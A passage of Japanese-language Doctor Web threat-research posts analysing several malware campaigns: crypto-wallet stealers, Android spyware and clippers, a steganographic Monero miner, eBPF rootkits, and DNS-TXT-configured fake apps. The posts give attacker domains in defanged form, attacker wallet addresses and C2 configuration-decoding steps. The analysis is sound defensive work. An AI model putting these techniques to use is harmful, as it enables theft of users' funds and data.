起動後、Trojan.Scavenger.4 はJavaScriptとWebAssemblyの実行エンジンであるV8エンジンから関数 v8::String::NewFromUtf8 フックします。これを利用することで、悪意のあるアプリがさまざまなユーザーデータを取得することが可能になります。Exodusのケースでは、トロイの木馬はキー passphrase を持つJSONを検索してその値を読み込みます。こうして、ユーザーの仮想通貨ウォレットの秘密鍵を復号化したり生成したりするために使用できるニーモニックフレーズを取得します。次に、トロイの木馬は仮想通貨ウォレットの秘密鍵 seed.seco を探り出して読み込み、そしてそれを取得済みのニーモニックフレーズと共にC2サーバーへ送信します。

2つのローダーを用いたチェーン

この感染チェーンは全体として前述のチェーンとほぼ同じですが、ゲームの「パッチ」や「チート」を含んで配信されるアーカイブには Trojan.Scavenger.1 の代わりに Trojan.Scavenger.2 の改変されたバージョンが含まれています。すなわち、この .ASI はDLLファイルではなく .ASI 拡張子を持つファイル(実際には拡張子の変更された動的ライブラリです)になっています。

このアーカイブにもインストール手順が含まれています。

Copy BOTH the Enhanced Nave Trainer folder and "Enhanced Native Trainer.asi" to the same folder as the scripthook and launch GTA.

ユーザーがファイルを指定されたディレクトリにコピーすると、それがゲームのプラグインとして認識されるようになり、ゲームと同時に自動的に起動されるようになります。この先のステップは1つ目の感染チェーンと同じです。

ファミリーに共通する特徴

このファミリーに属するトロイの木馬のほとんどがいくつかの共通した特徴を備えています。そのうちの1つが、仮想マシンやデバッグモードでの実行を検知するための、実行環境を検証する標準化された手順です。仮想環境で実行されている兆候を検出した場合、トロイの木馬は動作を停止します。

もう1つの共通点は、C2サーバーとの通信に使用されているアルゴリズムです。C2サーバーに接続するために、トロイの木馬は暗号化キーの生成と暗号化の検証というプロセスを実行します。このプロセスでは2つのリクエストが送信されます。1つ目のリクエストは特定のリクエストに含まれるパラメータやデータを暗号化するために使用されるキーの一部を受け取るために必要なものです。2つ目のリクエストはキーを検証するために送信され、ランダムに生成された文字列、現在の時刻、暗号化された時刻値などのパラメータを含んでいます。このリクエストに対し、C2サーバーは先に受け取った文字列を返します。以降のリクエストにはすべて時刻パラメータが含まれ、含まれていない場合サーバーは接続確立を拒否します。

検出された悪意のあるプログラムの詳細な技術的情報については、本調査レポートのPDFバージョンまたはDoctor Webウイルスライブラリを参照してください。

Trojan.Scavenger.1の詳細 ※英語

Trojan.Scavenger.2の詳細 ※英語

Trojan.Scavenger.3の詳細 ※英語

Trojan.Scavenger.4の詳細 ※英語

Trojan.Scavenger.5の詳細 ※英語

結論

Doctor Webでは、この度特定されたセキュリティ上の欠陥を悪用されていたソフトウェアのデベロッパーに対し報告を行いましたが、DLL検索順序ハイジャッキング脆弱性は修正不要であると判断されました。ただし、Dr.Web ユーザーに危害が及ぶことはありません。Dr.Webアンチウイルス製品に新たに導入されていたこの種の攻撃に対する保護機能により、標的となったブラウザの脆弱性悪用はマルウェアファミリー Trojan.Scavenger の存在が明らかになるよりも前からすでに確実に阻止されていました。また、本調査を受けて仮想通貨ウォレットExodusも同保護機能の対象に追加されました。

Indicators of compromise (侵害の痕跡) ※英語

地図アプリ「AlpineQuest」を使用するロシア軍関係者を標的としたAndroidスパイウェア型トロイの木馬

Tue, 22 Apr 2025 10:54:09 GMT

2025年4月22日

株式会社Doctor Web Pacific

Doctor Webのエキスパートは、ロシアの軍関係者を主な標的とするスパイウェアAndroid.Spy.1292.originを発見しました。このトロイの木馬は改変された地図アプリ「AlpineQuest」に隠されてさまざまな方法で拡散されており、ロシアのAndroidアプリ配信サイトもその拡散元の1つです。Android.Spy.1292.originは電話帳の連絡先やデバイスの位置などといった感染したデバイスに関する情報を攻撃者に送信します。さらに、デバイス上に保存されているファイルに関するデータを収集し、脅威アクターからコマンドを受け取った場合はファイルを盗むための機能を備えた追加のモジュールをダウンロードできます。

AlpineQuestはさまざまな地図をオンラインとオフラインのどちらでも利用できる地形図アプリで、アスリートや旅行者、ハンターの間で人気があります。一方で特別軍事作戦ゾーンのロシア軍関係者にも広く使用されており、この攻撃キャンペーンの実行者はそこに目を付け悪用しています。脅威アクターは Android.Spy.1292.origin をAlpineQuestアプリの古いバージョンに埋め込み、高度な機能を備えた「AlpineQuest Pro」の無料版として拡散していました。そのための手段としてTelegramに偽のチャンネルを作成し、トロイの木馬化されたアプリをロシアのAndroidアプリ配信サイトからダウンロードするためのリンクを提供しています。後に、この同じチャンネルからトロイの木馬化されたバージョンがAlpineQuest Proの「更新」を装って拡散されるようになりました。

脅威アクターがトロイの木馬 Android.Spy.1292.origin を拡散していたTelegramチャンネル

Android.Spy.1292.origin は正規アプリのコピーに埋め込まれているため見た目も動作も本物と変わるところがなく、ユーザーに気づかれずにより長期にわたって悪意のあるタスクを実行し続けることが可能です。

このトロイの木馬は起動されるたびに以下のデータを収集しC&Cサーバーに送信します。

ユーザーの携帯電話番号とアカウント
電話帳の連絡先
現在の日付
現在の位置情報
デバイスに保存されているファイルに関する情報
アプリのバージョン

同時に、情報の一部を攻撃者のTelegramボットにも送信します。たとえば、デバイスの位置が変わるたびに新しい位置情報がTelegramボットに送信されます。

デバイス上のファイルに関する情報を受け取った脅威アクターがその中にめぼしいファイルを見つけた場合、トロイの木馬にコマンドを送信して、ファイルを盗むための追加のモジュールをダウンロード・実行させることができます。Doctor Webのスペシャリストによる分析の結果からは、主に狙われているのはユーザーがTelegramやWhatsApp経由で送信する機密文書、そしてAlpineQuestによって作成される位置情報ログファイルlocLogであることが示されています

こうして、Android.Spy.1292.origin を使用することでユーザーの位置情報を追跡するだけでなく、機密ファイルを盗むことも可能になります。また、新しいモジュールをダウンロードすることで機能を拡張できるということは、ほかにもさまざまな悪意のあるタスクを実行させることが可能であるということを意味しています。

Doctor Webでは、Androidアプリは公式アプリストアなどの信頼できる提供元からのみインストールし、Telegramチャンネルや怪しいサイトからダウンロードしない(特に、本来有料版であるアプリが無料で提供されている場合など)ようにすることを推奨しています。また、攻撃者は似たような名前やロゴを使用して本物の開発者を装っていることが多いため、アプリを配信しているのが誰なのかを慎重に確認することも重要です。

Androidデバイスを保護するにはアンチウイルスの使用が不可欠です。Dr.Web Security Space for mobile devicesはトロイの木馬 Android.Spy.1292.origin を確実に検出・削除し、脅威からの強固な保護を提供します。

Indicators of compromise(侵害の痕跡) ※英語

Android.Spy.1292.origin の詳細 ※英語

チャットにご用心：安価なAndroidスマートフォンとWhatsAppと仮想通貨窃取の関係とは?

Wed, 16 Apr 2025 10:10:32 GMT

2025年4月16日

株式会社Doctor Web Pacific

仮想通貨(暗号資産)は、決済手段として年々広がりをみせています。2023年のデータによると、先進国では約20%の人が決済に仮想通貨を使用したことがあり、金融部門の発展が住民のニーズを満たせず銀行口座を持たない人の多い発展途上国では仮想通貨利用者の数はさらに多くなっています。国別の仮想通貨ユーザー数では、ロシアは上位10か国にランクインしています。決済の匿名性や取引の迅速性、送金手数料の低さ、そして地理的制約がなく世界中のどこからでもアクセス可能であるという点が一般ユーザーを惹きつける仮想通貨の主なメリットです。一方で詐欺師たちは、取引の不可逆性、規制の欠如、比較的新しい技術であるためユーザーに十分な知識がないという点に目を付けています。これらを悪用してさまざまな手口で違法に収益を得ることができるためです。

2024年6月を境に、新しく購入したAndroidスマートフォンにアンチウイルスDr.Web Security SpaceをインストールしたユーザーからDoctor Webのウイルスラボに多くの報告が寄せられるようになりました。システムパーティションのスキャンによって、メッセージングアプリWhatsAppに偽装した疑わしいアプリケーションが検出されたというものです。Doctor Webのアナリストによる調査の結果、このケースは単なる氷山の一角であることが明らかになりました。これらはすべて、クリッピングと呼ばれる手法を使用して仮想通貨を盗むキャンペーンのほんの一端にすぎなかったのです。

クリッピングとは、ユーザーがクリップボードにコピーしたデータを傍受またはすり替えることで情報を盗む手法です。多くの場合、クリッピングを行うマルウェアであるクリッパーはクリップボードを監視して仮想通貨ウォレットのアドレス形式を検知するよう設計されています。アドレスは通常25～42文字の文字列で、楽に入力するために「コピー」して「貼り付ける」(コピー&ペースト)機能を使用するユーザーがほとんどです。クリッパーはこれを悪用し、検知したすべての仮想通貨ウォレットアドレスを密かにサイバー犯罪者のウォレットアドレスに置き換えます。

クリッパーを仕込んだメッセージングアプリを使用して金融情報を盗む手法はハッカーたちにとって目新しいものではありません。そのようなキャンペーンの1つは2023年に始まっています。当時の攻撃者グループはYouTubeなどの正規のプラットフォームを利用して悪意のあるTelegramやWhatsAppアプリへのリンクを拡散していました。リンクは動画の説明欄に貼られており、主な標的は海外のメッセージングアプリにアクセスすることのできない中国のユーザーでした。そのようなユーザーはジオブロッキングを回避するためになんらかの手段を用いる必要があり、最も多く使用されていたのが非公式サイトからプログラムをダウンロードするという方法だったため、このキャンペーンは攻撃者にとって大きな成功となりました。

現在では攻撃者も新たなレベルへと進化を遂げ、中国の複数のAndroidスマートフォンメーカーのサプライチェーンにアクセスしています。Doctor Webのウイルスラボに報告があったケースで使用されていたのはそのようなスマートフォンで、偽アプリはスマートフォンにプリインストールされていたソフトウェア内で検出されています。すなわち、WhatsAppに悪意のあるコードが追加されていたのです。

侵害されたデバイスのほとんどは低価格帯のもので、有名ブランドのモデルとよく似た名前が付けられています(S23 Ultra、Note 13 Pro、P70 Ultraなど)。そのうえ、実際の技術仕様は製品ページに記載されているものと大きく異なっていました。そのために脅威アクターが使用していたのが、デバイスの「端末情報」ページに表示される内容のみでなく、AIDA64やCPU-Zなどといった定番アプリケーションのレポート内に表示されるすべての技術情報を簡単に偽装することのできるアプリケーションです。「端末情報」ページには最新のAndroid 14が搭載されていると記載されていましたが、実際にはすべてのデバイスにAndroid 12の同じビルドが搭載されていました。以下の表に記載されているモデルの3分の1はSHOWJIブランドのものです。残りのモデルについては、残念ながらメーカーを特定することはできませんでした。

SHOWJI S19 Pro	Note 30i	Camon 20
SHOWJI Note 13 Pro	S23 Ultra	P70 Ultra
SHOWJI X100S Pro	S18 Pro	M14 Ultra
SHOWJI Reno12 Pro	6 Pro	S24 Ultra

悪意のあるソフトウェアがプリインストールされていたスマートフォンのモデル(Doctor Webのユーザーが購入したもの)

不自然な誤ったロシア語(「高速のTastydragonなCPU」、「5000万台のカメラ」)で高性能をうたう製品説明

デバイスの技術仕様を偽装するために使用されていたアプリケーションのスクリーンショットとその偽装結果

「DevCheck」というアプリを使用することで、より正確にデバイスの仕様を確認することができます。たとえメーカーがユーザーを欺こうとしている場合であっても、このアプリケーションは高確率で製品の正しい仕様を特定してくれます。

トロイの木馬化されたWhatsAppアプリケーションを作成するために脅威アクターはLSPatchツールを使用しています。このフレームワークは、コードに手を加えるのではなく追加のソフトウェアモジュールをロードすることでメインアプリケーションの動作を変更することを可能にします。今回のケースでは、悪意のあるモジュールcom.whatsHook.apkがassetsフォルダ内に置かれていました。このモジュールは以下の機能を実行します。

アプリケーション更新のハイジャック：アプリケーションはhxxps://www.whatsapp[.]com/android/current/WhatsApp[.]apkで更新を確認する代わりに、攻撃者のサーバーの1つにアクセスするようになります(例：hххps://apk-download[.]pro/download/whatsapp[.]apk)。これにより、アプリケーションをトロイの木馬化されたままの状態に保ち、その動作に脅威アクターの望む変更を加えることができます。

正規の更新サーバーへのリクエストをハイジャックするメソッド

正規の更新アドレスを偽の更新アドレスに置き換えるクラス

送受信メッセージ内で仮想通貨Tron(Tで始まる34文字の文字列)およびEtherium(0xで始まる42文字の文字列)のウォレットアドレス形式に一致する文字列を検出し、それらを攻撃者のアドレスに置き換える：今回のケースではクリッパーの基本的な機能が拡張されており、ユーザーが異変に気づくことすらないようになっています。送信メッセージの場合、侵害されたデバイスではユーザー自身の正しいウォレットアドレスが表示され、メッセージの受信者には攻撃者のウォレットアドレスが表示されます。受信メッセージの場合、送信者には自分のウォレットアドレスが表示され、ユーザーのデバイスでは受信するアドレスが攻撃者のウォレットアドレスにすり替えられます。ウォレットアドレスは攻撃キャンペーンを繰り返すたびに変更されていますが、トロイの木馬にはなんらかの理由でC2サーバーとの接続を確立できなかった場合に使用できるバックアップアドレス(「TN7pfenJ1ePpjoPFaeu46pxjT9rhYDqW66」、「0x673dB7Ed16A13Aa137d39401a085892D5e1f0fCA」)も含まれています。また、トロイの木馬はWhatsAppチャット内のメッセージをすべて攻撃者のサーバーに送信します。

Tronウォレットアドレスに一致する文字列を検索するパーサー

Etheriumウォレットアドレスに一致する文字列を検索するパーサー

以下のフォルダ内にあるすべての.jpg、.png、.jpeg画像を検出し、攻撃者のサーバーに送信する：

DCIM	DOWNLOADS
PICTURES	DOCUMENTS
ALARMS	SCREENSHOTS

これは、仮想通貨ウォレットのいわゆるニーモニック(リカバリー)フレーズを見つけるために行われます。ニーモニックフレーズ(mnemonic phrases)は特定の順序で並んだ12～24文字の単語で、ウォレットの作成時に一度だけ表示されます。多くのユーザーはこれを書き留めたり別の媒体に保存したりするのではなく、単純にスクリーンショットを撮ることで済ませています。ユーザーがパスワードを忘れてしまった場合にこのフレーズを使用することでウォレットにアクセスできます。それがニーモニックフレーズの正規の目的ですが、裏を返せば、攻撃者がそのようなデータを入手することで仮想通貨ウォレットから即座にすべての資産を盗み出すことができるということでもあります。

仮想通貨ウォレットへのアクセスを復元するためのニーモニックフレーズの例。ユーザーはこれらの単語を数字の順番どおりに入力する必要がある。

デバイスに関する情報を送信する(デバイスのメーカー、モデル、言語設定、トロイの木馬化されたアプリケーションの名前)：合計で約40の異なるアプリケーションが改変されており、これには前述のWhatsAppやTelegramに加え、その他のメッセージングアプリやQRコードスキャナなどが含まれています。より重大なのは、広く使用されている仮想通貨ウォレットアプリ(Mathwallet、Trust Walletなど)も侵害されていたということです。

このトロイの木馬は、そのコード内に「Log.e("", "-------------------SHIBAI-释放------------")」という文字列を含んでいたことから「Shibai」という名前でDoctor Webウイルスデータベースに登録されています。この「Shibai」は仮想通貨の銘柄の1つからとられたものと考えられます。

残念ながら、この攻撃キャンペーンは大きく勢いを増しています。60台を超えるC2サーバーによって管理され、悪意のあるアプリケーションを拡散するためにおよそ30のドメインが使用されています。Doctor Webではこのトロイの木馬の作成者が得た金銭的利益に関する情報を入手することに成功しました。ウォレットの1つには過去2年間で100万ドル以上が入金されており、また別のウォレットには総額50万ドルが保有されています。残り約20のウォレットは合計で最大10 万ドルを保有していました。ウォレットアドレスは攻撃者のサーバーから取得したものであり、それらは常時変更される可能性があるため、このキャンペーン全体の収益を把握することは不可能です。

最も多く資産を保有していた仮想通貨ウォレットの1つ

このような攻撃から身を守るために、Doctor Webでは次のような対策を推奨しています：

モバイルデバイス用アンチウイルスDr.Web Security Space for mobile devicesをインストールする
価格と性能のバランスが明らかにおかしい(安価なのに高性能)スマートフォンを購入しない
Google PlayやRustore、AppGalleryなどの信頼できる提供元からのみアプリケーションをダウンロードする
ニーモニックフレーズやパスワード、キーのスクリーンショットを暗号化されていない状態でデバイスに保存しない

Tool.LSPatch.1 の詳細 ※英語

Android.Clipper.31 の詳細 ※英語

Indicators of compromise(侵害の痕跡) ※英語

仮想通貨マイニングキャンペーンに使用されるステガノグラフィ

Mon, 27 Jan 2025 12:04:03 GMT

2025年1月27日

株式会社Doctor Web Pacific

Doctor Webのウイルスアナリストはテレメトリデータの分析中にマルウェアサンプルを特定し、詳細な調査を行った結果、それらは仮想通貨Moneroをマイニングするアクティブなキャンペーンに使用されているコンポーネントであることが明らかになりました。このキャンペーンは一連のマルウェアチェーンとして実行されているという点で際立っています。そのうちの2つはBMP画像ファイルから悪意のあるペイロードを抽出するスクリプトの実行をベースに構成されています。

このキャンペーンは悪意のあるVBscriptを実行する.NETアプリケーション Services.exe がDoctor Webのアナリストによって初めて発見された2022年に始まったものとみられます。このスクリプトは、攻撃者のサーバーに接続して応答として送信されたスクリプトとファイルを実行するバックドアとして機能します。その結果として、拡張子がps1からtxtに変更されたPowerShellスクリプトである悪意のあるファイル ubr.txt が被害者のコンピューター上にダウンロードされていました。

ubr.txt スクリプトは、侵害したマシン上に仮想通貨マイナーがインストールされているかどうかをチェックし、マイナーが存在した場合はそれを攻撃者のものに置き換えます。ここで ubr.txt スクリプトによってインストールされていたのは、ハッカーが仮想通貨Moneroをマイニングするために使用するマイナーSilentCryptoMinerとその設定でした。

Doctor Webでは、このマイナーが使用された攻撃についてこれまでにも記事を掲載しています。SilentCryptoMinerは、その設定の容易さ、異なる種類の仮想通貨をマイニングし診断ユーティリティによる検知を逃れる高度な機能、そしてボットネット内のすべてのマイナーをWebパネルからリモート管理できるという特徴によって攻撃者を惹きつけています。

このキャンペーンでは、マイナーファイルはWeb会議アプリケーションZoom（ ZoomE.exe および ZoomX.exe ）やWindowsサービス（ Service32.exe および Service64.exe ）などのさまざまなソフトウェアのコンポーネントに偽装していました。これら悪意のあるファイルには複数のセットがあり異なる名前が付いていますが、それらはすべて同じタスク（他のマイナーを削除、新しいマイナーをインストール、インストールしたマイナーにアップデートを配信）を実行します。

PowerShellスクリプトであるubr.txt

さらに、マイナーは仮想通貨のマイニング設定を含んだ m.txt ファイルをホストする getcert[.]net ドメインにアクセスします。このドメインは他の感染チェーンでも使用されています。

m.txtファイルに含まれているマイナーの設定

キャンペーンが進行するうちに、その攻撃手法はより興味深いものへと変化していきました。すなわち、ステガノグラフィが組み込まれるようになったのです。

ステガノグラフィは、ある情報を別の情報の中に埋め込んで隠す手法です。暗号化されたデータが目を引く可能性のある暗号化手法と異なり、ステガノグラフィは情報を画像などの中に目立たず密かに隠蔽することが可能です。多くのサイバーセキュリティエキスパートは、防御を回避する目的で今後ステガノグラフィが多く使用されるようになると考えています。

左の画像（出典：Marek Piwnicki）にはDr.Webロゴの画像が隠されている

より新しい2つ目の攻撃チェーンではPowerShellスクリプト Async.ps1 を実行するAmadeyトロイの木馬が使用されています。このスクリプトは正規の画像ホスティングサイト imghippo.com からBMP画像をダウンロードし、ステガノグラフィアルゴリズムによってそれらの画像から2つの実行ファイルが抽出されます。スティーラー Trojan.PackedNET.2429 と、以下の動作を実行するペイロードです。

管理者のUACプロンプトを無効にする
組み込みのウイルス対策機能Windows Defenderに多数の除外を追加する
Windowsの通知を無効にする
\Microsoft\Windows\WindowsBackup\に「User」という名前の新しいタスクを作成する

Async1.psスクリプトの内容

タスクは実行中に攻撃者のドメインにアクセスし、このドメインのDNS TXTレコードにペイロードへのアドレスが含まれています。BMP画像を含むアーカイブがダウンロードされた後に解凍され、以下のファイルが実行されます。

Cleaner.txt：他のすべてのマイナーを削除するPowerShellスクリプト。
m.txt：m.Bmp画像と IV.Bmp画像からペイロードを抽出するPowerShellスクリプト。画像内に隠されているペイロードはSilentCryptoMinerとそれを実行するインジェクターです。
Net.txt：ドメインwindowscdn[.]siteとbuyclients[.]xyzからDNS TXTレコードを読み込むスクリプト。このレコードにはペイロードへのリンクraw.githack[.]comが含まれています。

DNS TXTレコードは標準的なDNSレコードを拡張したもので、ドメインの検証に役立つデータが含まれています。ただし、今回のケースでペイロードリンクが含まれていたように、ドメイン所有者はそこにあらゆるデータを含めることが可能です。

悪意のある画像を含むアーカイブの内容

マイナーのモジュールは絶えず進化を続けています。最近では、悪意のある画像のホスティング先に正規リソースが、そしてペイロードの保存先にGitHubプラットフォームが使用されるようになっています。さらに、マルウェアがサンドボックスや仮想マシン内で実行されていないかどうかをチェックするモジュールも確認されています。

実行中のアプリケーションの名前を、サイバーセキュリティリサーチャーによって一般的に使用されるツールの名前と照らし合わせてチェックするモジュール

マイナーの設定内で発見されたウォレットの1つは2022年5月に作成されたもので、これまでに340 XMRが入金されています。現在、仮想通貨Moneroの為替レートには大幅な変動がみられるため、実際に攻撃者が手にする利益は65,000～70,000米ドルになると考えられます。ハッシュレートカーブが波形を描いていることから、ボットネットが定期的にオンとオフを繰り返していることが分かり、このマイニングキャンペーンには主に同じタイムゾーンにいる一般のユーザーが関わっているものと考えられます。平均ハッシュレートは1秒あたり330万ハッシュで、侵害されたマシンは約40時間ごとに1XMRの利益を攻撃者にもたらしていることになります。

このキャンペーンはステガノグラフィを用いたサイバー脅威における氷山の一角にすぎず、デジタル空間で常に警戒を怠らないことの重要性を改めて強調するものです。Doctor Webからの推奨事項はこれまでと変わりません。信頼できるソースからのみソフトウェアをインストールし、疑わしいリンクをクリックせず、インターネットからファイルをダウンロードする際はアンチウイルス保護を無効にしないようにしてください。

攻撃チェーン

Indicators of compromise(侵害の痕跡) ※英語

SilentCryptoMinerの詳細 ※英語

PowerShell.Starter.98の詳細 ※英語

PowerShell.DownLoader.1640の詳細 ※英語

Trojan.PackedNET.2429の詳細 ※英語

VBS.DownLoader.2822の詳細 ※英語

マルウェアの最新トレンド：eBPFの悪用、意表を突いたマルウェア設定の保存場所、増加するカスタムのポストエクスプロイトツールの使用

Wed, 11 Dec 2024 11:32:03 GMT

2024年12月11日

株式会社Doctor Web Pacific

情報セキュリティインシデントの調査を行うなかで、Doctor Webのウイルスアナリストは進行中のキャンペーンを発見しました。このキャンペーンにはサイバー犯罪者が駆使する最新のトレンドが多数取り入れられています。

社内のコンピューターインフラストラクチャが侵害されている疑いがあるという内容の調査依頼をクライアントの一社から受けたDoctor Webは、同社から提供されたデータの分析を行いました。その間にもDoctor Webのウイルスアナリストによって同様のケースが複数特定され、このことから、アクティブなキャンペーンが進行中であるという結論が導き出されました。攻撃は主に東南アジア地域に集中しているように見られます。ハッカーは包括的なマルウェアスイート（マルウェア群）を使用し、それらを攻撃のあらゆる段階で導入しています。侵害されたマシンへの最初のアクセスがどのように取得されたのかを特定することは残念ながらできませんでしたが、Doctor Webでは残りの攻撃チェーンを再現することに成功しました。ここで目を引くのは、脅威アクターがeBPF（extended Berkeley Packet Filter）テクノロジーを悪用しているという点です。

eBPFは、Linuxオペレーティングシステムのネットワークサブシステムとそのプロセスに対するコントロールを向上させるために開発されたテクノロジーです。その著しいポテンシャルの高さが大手IT企業の関心を集め、GoogleやHuawei、Intel、Netflixなどの巨大企業が発足とほとんど同時にeBPF Foundationに加入し、さらなる開発を推進しています。一方で、ハッカーもまたeBPFに注目しています。

広範な低レベルの機能を提供するeBPFを悪意のあるアクターが利用することで、ネットワークアクティビティとプロセスを隠したり、機密情報を収集したり、ファイアウォールや侵入検知システムをバイパス（回避）したりすることが可能になります。その結果として検出に時間がかかるようになったマルウェアをAPT攻撃（Advanced Persistent Threat：高度な持続的標的型攻撃）に使用し、長期間にわたってハッカーの存在を隠すことができます。

これらの機能を悪用するために、攻撃者は侵害したマシン上に2つのルートキットをロードしていました。1つ目はeBPFルートキットで、カーネルモジュールとして実装されている別のルートキットの動作を隠すためのものです。この2つ目のルートキットが、システムにリモートアクセス型トロイの木馬をインストールできるようにします。このトロイの木馬の特徴的な機能はさまざまなトラフィックトンネリング技術をサポートしているというもので、これによりプライベートネットワークセグメントから攻撃者と通信し、コマンドの送信を隠すことができます。

総じて、悪意のあるeBPFソフトウェアは2013年以降ますます多く使用されるようになっており、このテクノロジーをベースにしたBoopkit、BPFDoor、Symbioteなどの複数のマルウェアファミリーの登場がそれを裏付けています。状況の悪化に拍車をかけているのが、繰り返し発見されるeBPFの新たな脆弱性です。現時点で217件の脆弱性が知られており、そのうちの約100件が2024年に発見されたものとなっています。

このキャンペーンのもう1つの顕著な特徴は、トロイの木馬の設定を保存する場所に関するいささか斬新なアプローチです。これまでは多くの場合、保存場所として専用のサーバーが使用されていましたが、現在ではパブリックプラットフォーム上に公然と保存されるケースが増えています。たとえば、今回発見されたマルウェアはGitHubなどのプラットフォームのほか、情報セキュリティに関する中国のブログにさえアクセスしていました。この方法を用いることで、侵害されたマシンからのトラフィックが注意を引かないようにすることが可能です。一見すると、マシンは安全なネットワークホストと通信しているように見えるからです。また、設定が保存されているコントロールサーバーへのアクセスを確保しなければならない必要もなくなります。一般に公開されているサービスをコントロールインフラストラクチャとして使用するという手法は目新しいものではありません。これまでにもDropbox、Google Drive、OneDrive、さらにはDiscordがハッカーに利用されています。ただしこれらのサービスは一部の国、特に中国では地域によって使用が制限されているため、確実性という点で劣ります。一方でGitHubへのアクセスはほとんどのプロバイダーで利用可能なままであり、そのためハッカーにとってより魅力的なプラットフォームとなっています。

GitLabとセキュリティブログに保存されている設定。面白いことに、後者ではハッカーがサードパーティのコードを復号化するために協力を求めています。このコードはその後、コマンドの1つの引数としてトロイの木馬に送信されます。

このキャンペーンにはまた別の特徴があります。それはトロイの木馬が、コンピューターへの不正アクセス後に用いられるソフトウェアスイートであるポストエクスプロイトフレームワークのコンポーネントとしても使用され始めているというものです。このようなフレームワーク自体は違法なものではなく、セキュリティ監査サービスを提供する企業によって使用されています。最も人気のあるツールは、多数のチェックを自動化することができ、内蔵の脆弱性データベースを持つCobalt StrikeとMetasploitです。

Cobalt Strikeによって作成されたネットワークマップの例（出典：公式サイト）

そしてもちろん、そのような機能は脅威アクターにとっても非常に魅力的です。2022年には不正利用のために改変されたクラック版のCobalt Strikeがリリースされ、ハッキング活動の急増を引き起こしました。地理的には、Cobalt Strikeインフラストラクチャは主に中国にあります。Cobalt Strikeの開発元はすべてのインストールを追跡することに注力しており、クラック版のサーバーは法執行機関によってたびたびシャットダウンされています。そのため現在では、そのままですぐに使用できる拡張機能をサポートしており、感染したホストとそのコントロールサーバー間のネットワーク通信を変更できる、オープンソースのフレームワークを使用する傾向がハッカーの間で強まっています。この手法を用いることで、ハッカーのインフラストラクチャが余計な注意を引かないようにすることができるためです。

今回の調査の結果、特定されたすべての脅威はDoctor Webのウイルスデータベースに登録され、悪意のあるeBPFソフトウェアを確実に検出するためにヒューリスティックルールも追加されました。

Trojan.Siggen28.58279の詳細 ※英語

Indicators of compromise(侵害の痕跡) ※英語

Google Playに悪意のあるアプリ：DNSプロトコルを使用して密かにC&Cサーバーに接続するトロイの木馬

Tue, 12 Nov 2024 12:38:36 GMT

2024年11月12日

株式会社Doctor Web Pacific

Android.FakeAppファミリーに属するトロイの木馬の多くはさまざまなサイトへのリンクを開くことを目的としており、技術的観点から見ると、そのようなマルウェアは極めて原始的であるといえます。これらトロイの木馬は起動されるとコマンドを受け取り、指定されたアドレスのサイトを開きます。その結果、ユーザーの画面にはインストールしたはずのプログラムやゲームの代わりに望まないサイトのコンテンツが表示されます。しかしながら、そのような偽アプリの中にもひときわ目を引くものが出現することがあります。それがAndroid.FakeApp.1669です。Android.FakeApp.1669は、開くべきリンクを含んだ設定を悪意のあるDNSサーバーから受け取るために、改変されたdnsjavaライブラリを使用するという点で他のAndroid.FakeAppトロイの木馬と異なっています。一方で、この設定はトロイの木馬が特定のサービスプロバイダ(モバイルインターネットのプロバイダなど)経由でインターネットに接続している場合にのみ送信され、それ以外の場合、トロイの木馬は一切姿を現しません。

Android.FakeApp.1669 にはさまざまなプログラムを装った多数の亜種が存在します。それらの拡散元の1つとなっているのがGoogle Playで、現時点で明らかになっている亜種が合計で216万回以上ダウンロードされています。

Android.FakeApp.1669 が潜んでいるアプリの例

以下の表は、Doctor WebのマルウェアアナリストによってGoogle Play上で発見された Android.FakeApp.1669 の亜種のリストです。リストに記載されてるものは一部であり、実際にはより多くの Android.FakeApp.1669 が発見されていますが、そのうちのいくつかは現在Google Playから削除されています。

アプリ名	ダウンロード数
Split it: Checks and Tips	1,000,000+
FlashPage parser	500,000+
BeYummy - your cookbook	100,000+
Memogen	100,000+
Display Moving Message	100,000+
WordCount	100,000+
Goal Achievement Planner	100,000+
DualText Compare	100,000+
Travel Memo	100,000+ (削除済み)
DessertDreams Recipes	50,000+
Score Time	10,000+

Android.FakeApp.1669 は起動されるとC&CサーバーにDNSリクエストを送信して、ターゲットドメイン名に関連付けられたTXTレコードを受け取ります。ただし、サーバーがトロイの木馬にこのレコードを送信するのは、感染したデバイスが特定のプロバイダ(モバイルインターネットプロバイダなど)経由でインターネットに接続している場合のみです。TXTレコードには通常、ドメインデータと追加の技術的情報が含まれていますが、 Android.FakeApp.1669 の場合はマルウェアの設定がエンコードされています。

Android.FakeApp.1669 はDNSリクエストを送信するためにdnsjavaオープンソースライブラリの改変されたコードを使用します。

Android.FakeApp.1669 のすべての亜種はそれぞれ特定のドメイン名に紐づけられており、DNSサーバーから異なる独自の設定を受け取ることができます。また、これらターゲットドメインのサブドメイン名は感染したデバイスごとに異なるユニークなものとなっています。そこには以下の機密情報を含む、デバイスに関するエンコードされたデータが含まれています。

デバイスのモデルとメーカー
画面サイズ
ID(2つの数字で構成されており、1つ目はマルウェアがインストールされた時刻、2つ目はランダムな数字)
デバイスのバッテリーが充電中かどうか、および現在の充電率
開発者モードが有効になっているかどうか

例として、アプリ「Goal Achievement Planner」に潜んだ Android.FakeApp.1669 の亜種はドメイン 3gEBkayjVYcMiztlrcJXHFSABDgJaFNNLVM3MjFCL0RTU2Ftc3VuZyAg[.]simpalm[.]com. のTXTレコードを送信するようサーバーにリクエストしており、「Split it: Checks and Tips」に潜んだ亜種はドメイン 3gEBkayjVYcMiztlrcJXHFTABDgJaFNNLVM3MjFCL0RTU2Ftc3VuZyAg[.]revolt[.]digital. の、「DessertDreams Recipes」に潜んだ亜種はドメイン 3gEBkayjVYcMiztlrcJXHFWABDgJaFNNLVM3MjFCL0RTU2Ftc3VuZyAg[.]outorigin[.]com. のTXTレコードをリクエストしていることが、分析の結果明らかになっています。

Android.FakeApp.1669の亜種の1つを分析中に、Linuxの「dig」ツール経由でのリクエストに対してDNSサーバーが返した、ターゲットドメインのTXTレコードの例

これらのTXTレコードの内容は、次の手順で復号化することができます。

文字列を反転させる
Base64データをデコードする
gzipデータを解凍する
÷という文字を挟んで改行する

その結果、次のようなデータを得ることができます(以下の例はアプリ「Goal Achievement Planner」に送信されたTXTレコードのものです)。

url
hxxps[:]//goalachievplan[.]pro
af_id
DF3DgrCPUNxkkx7eiStQ6E
os_id
f109ec36-c6a8-481c-a8ff-3ac6b6131954

